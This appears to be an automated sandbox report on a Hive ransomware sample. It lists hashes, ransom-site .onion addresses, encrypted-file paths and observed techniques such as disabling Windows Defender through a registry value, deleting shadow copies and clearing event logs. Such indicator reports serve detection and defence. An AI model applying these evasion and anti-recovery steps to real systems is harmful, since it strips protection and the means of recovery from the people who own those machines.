Analysis
max time kernel: 234s
max time network: 181s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 14:34
Static task: static1
Behavioral task: behavioral1
Sample: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Resource: win7-en-20211208
General
Target: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Size: 3.8MB
MD5: 3ef03bfba1665597a824e136fad174de
SHA1: b0e02886ca9c7edce20380934f78fa8e5bb931b9
SHA256: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8
SHA512: 3773754a433e885db06484ce9b4a4ff3936de153f2954c0c4c4487148fa28f8947ec2eef756f09b408fb1ca3472d8798757ee418a1e5a671ef3a0a924c364309
Malware Config
Extracted
Ransom note path: C:\wPfq_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
Uses mpcmdrun utility to delete all AV definitions.
Processes:
pid | process
3304 | MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
Modifies security service (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Clears Windows event logs (1 TTPs)
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Processes:
pid | process
2180 | bcdedit.exe
2348 | bcdedit.exe
Modifies extensions of user files (10 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File renamed | C:\Users\Admin\Pictures\ReceiveSkip.png => C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File renamed | C:\Users\Admin\Pictures\ConvertToLock.tif => C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File renamed | C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File renamed | C:\Users\Admin\Pictures\SyncExport.tiff => C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File renamed | C:\Users\Admin\Pictures\UpdateDismount.raw => C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART9.BDR.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7336_40x40x32.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\fue_3_1.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\.lastModified.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_NgAAADYAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\vreg\powerview.x-none.msi.16.x-none.vreg.dat.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\fi_60x42.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80_altform-unplated_contrast-white.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-125.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_FgAAABYAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EgAAABIAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\SmallTile.scale-200.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-150.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EAAAABAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Sounds\StarsFlying_D.wav | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\178.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionMedTile.scale-400.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\Emboss.scale-100.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Folder.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\UpsellContentDialogHeader.jpg | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_24x24x32.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_IAAAACAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-black_scale-100.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W3.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\ribbon.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\Functions.fx | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_BgAAAAYAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\02.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7656_24x24x32.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-40_altform-unplated.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_KgAAACoAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-black_scale-125.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxWideTile.scale-200.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File created | C:\Program Files\VideoLAN\VLC\plugins\access\wPfq_HOW_TO_DECRYPT.txt | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\TellMeWord.nrr.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cw_60x42.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-200.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_JgAAACYAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\whew.png | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
2380 | vssadmin.exe
Modifies registry class (3 IoCs)
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
pid | process
1656 | powershell.exe
1656 | powershell.exe
1656 | powershell.exe
1916 | powershell.exe
1916 | powershell.exe
1916 | powershell.exe
2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
description | pid | process
Token: SeSecurityPrivilege | 1420 | wevtutil.exe
Token: SeBackupPrivilege | 1420 | wevtutil.exe
Token: SeSecurityPrivilege | 2056 | wevtutil.exe
Token: SeBackupPrivilege | 2056 | wevtutil.exe
Token: SeSecurityPrivilege | 3180 | wevtutil.exe
Token: SeBackupPrivilege | 3180 | wevtutil.exe
Token: SeIncreaseQuotaPrivilege | 4004 | wmic.exe
Token: SeSecurityPrivilege | 4004 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4004 | wmic.exe
Token: SeLoadDriverPrivilege | 4004 | wmic.exe
Token: SeSystemProfilePrivilege | 4004 | wmic.exe
Token: SeSystemtimePrivilege | 4004 | wmic.exe
Token: SeProfSingleProcessPrivilege | 4004 | wmic.exe
Token: SeIncBasePriorityPrivilege | 4004 | wmic.exe
Token: SeCreatePagefilePrivilege | 4004 | wmic.exe
Token: SeBackupPrivilege | 4004 | wmic.exe
Token: SeRestorePrivilege | 4004 | wmic.exe
Token: SeShutdownPrivilege | 4004 | wmic.exe
Token: SeDebugPrivilege | 4004 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4004 | wmic.exe
Token: SeRemoteShutdownPrivilege | 4004 | wmic.exe
Token: SeUndockPrivilege | 4004 | wmic.exe
Token: SeManageVolumePrivilege | 4004 | wmic.exe
Token: 33 | 4004 | wmic.exe
Token: 34 | 4004 | wmic.exe
Token: 35 | 4004 | wmic.exe
Token: 36 | 4004 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 2320 | wmic.exe
Token: SeSecurityPrivilege | 2320 | wmic.exe
Token: SeTakeOwnershipPrivilege | 2320 | wmic.exe
Token: SeLoadDriverPrivilege | 2320 | wmic.exe
Token: SeSystemProfilePrivilege | 2320 | wmic.exe
Token: SeSystemtimePrivilege | 2320 | wmic.exe
Token: SeProfSingleProcessPrivilege | 2320 | wmic.exe
Token: SeIncBasePriorityPrivilege | 2320 | wmic.exe
Token: SeCreatePagefilePrivilege | 2320 | wmic.exe
Token: SeBackupPrivilege | 2320 | wmic.exe
Token: SeRestorePrivilege | 2320 | wmic.exe
Token: SeShutdownPrivilege | 2320 | wmic.exe
Token: SeDebugPrivilege | 2320 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 2320 | wmic.exe
Token: SeRemoteShutdownPrivilege | 2320 | wmic.exe
Token: SeUndockPrivilege | 2320 | wmic.exe
Token: SeManageVolumePrivilege | 2320 | wmic.exe
Token: 33 | 2320 | wmic.exe
Token: 34 | 2320 | wmic.exe
Token: 35 | 2320 | wmic.exe
Token: 36 | 2320 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 2320 | wmic.exe
Token: SeSecurityPrivilege | 2320 | wmic.exe
Token: SeTakeOwnershipPrivilege | 2320 | wmic.exe
Token: SeLoadDriverPrivilege | 2320 | wmic.exe
Token: SeSystemProfilePrivilege | 2320 | wmic.exe
Token: SeSystemtimePrivilege | 2320 | wmic.exe
Token: SeProfSingleProcessPrivilege | 2320 | wmic.exe
Token: SeIncBasePriorityPrivilege | 2320 | wmic.exe
Token: SeCreatePagefilePrivilege | 2320 | wmic.exe
Token: SeBackupPrivilege | 2320 | wmic.exe
Token: SeRestorePrivilege | 2320 | wmic.exe
Token: SeShutdownPrivilege | 2320 | wmic.exe
Token: SeDebugPrivilege | 2320 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 2320 | wmic.exe
Token: SeRemoteShutdownPrivilege | 2320 | wmic.exe
Token: SeUndockPrivilege | 2320 | wmic.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
description | pid | process | target process
PID 2788 wrote to memory of 1872 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 1872 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 1872 wrote to memory of 1284 | 1872 | net.exe | net1.exe
PID 1872 wrote to memory of 1284 | 1872 | net.exe | net1.exe
